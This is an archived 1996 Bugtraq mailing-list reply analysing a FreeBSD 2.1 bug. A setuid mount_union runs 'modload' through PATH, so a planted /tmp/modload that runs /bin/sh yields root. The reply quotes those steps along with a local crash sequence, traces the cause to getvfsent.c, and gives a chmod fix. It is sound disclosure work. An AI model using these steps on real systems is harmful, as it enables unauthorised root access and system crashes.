Bugtraq mailing list archives
Re: BoS: SECURITY BUG in FreeBSD
From: root () edmweb com (Steve Reid)
Date: Fri, 17 May 1996 15:45:18 -0700
> FreeBSD has a security hole...
> dangerous is mount_union if suid is set
> vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
> probably FreeBSD 2.1 STABLE is not vulnerable
> to crash system (as a normal user) try this:
>
> mkdir a
> mkdir b
> mount_union ~/a ~/b
> mount_union -b ~/a ~/b
Hmm.... Needless to say, I've done a "chmod a-s /sbin/mount*" on all of the FreeBSD machines I operate (all are 2.1.0-RELEASE with minor changes). Ordinary users shouldn't be allowed to mount anything, anyway.
> to got euid try this:
>
> export PATH=/tmp:$PATH     #if zsh, of course
> echo /bin/sh >/tmp/modload
> chmod +x /tmp/modload
> mount_union /dir1 /dir2
>
> and You are root!
Obviously, mount_union is depending on modload being on the $PATH, rather than using "/sbin/modload". It seems this is not a bug in mount_union itself, but in getvfsent.c...

/usr/src/lib/libc/gen/getvfsent.c:
[deletia]
        snprintf(name_mod, sizeof name_mod, "%s%s", name, "_mod");
        status = execlp("modload", "modload", "-e", name_mod, "-o",
                        name_mod, "-u", "-q", path, (const char *)0);
        exit(status ? errno : 0);
}
[EOF]

Clearly, execlp() should be calling modload as "/sbin/modload" instead.

Because this is a bug in getvfsent.c and not mount_union, it's possible that other mount_* commands would have the same hole if suid root.

chmod a-s /sbin/mount*

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve () edmweb com  Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)